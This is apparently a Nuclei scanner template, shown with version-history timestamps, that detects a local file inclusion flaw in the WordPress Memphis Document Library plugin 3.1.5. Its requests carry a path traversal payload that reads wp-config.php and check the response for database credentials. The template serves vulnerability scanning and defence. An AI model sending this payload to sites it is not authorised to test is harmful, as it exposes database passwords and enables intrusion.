2021-07-17 11:02:15 +00:00
|
|
|
id: wp-memphis-documents-library-lfi
|
2021-07-17 10:38:12 +00:00
|
|
|
|
|
|
|
info:
|
2022-07-29 14:04:23 +00:00
|
|
|
name: WordPress Memphis Document Library 3.1.5 - Local File Inclusion
|
2021-07-17 10:47:45 +00:00
|
|
|
author: 0x_Akoko
|
2021-07-17 10:38:12 +00:00
|
|
|
severity: high
|
2022-07-29 14:04:23 +00:00
|
|
|
description: WordPress Memphis Document Library 3.1.5 is vulnerable to local file inclusion.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-08-19 14:44:46 +00:00
|
|
|
- https://www.exploit-db.com/exploits/39593
|
|
|
|
- https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f
|
2022-07-29 14:04:23 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: wpscan,wordpress,wp-plugin,lfi,edb
|
2021-07-17 10:38:12 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/mdocs-posts/?mdocs-img-preview=../../../wp-config.php'
|
|
|
|
- '{{BaseURL}}/?mdocs-img-preview=../../../wp-config.php'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "DB_NAME"
|
|
|
|
- "DB_PASSWORD"
|
|
|
|
part: body
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-07-29 14:04:23 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/07/29
|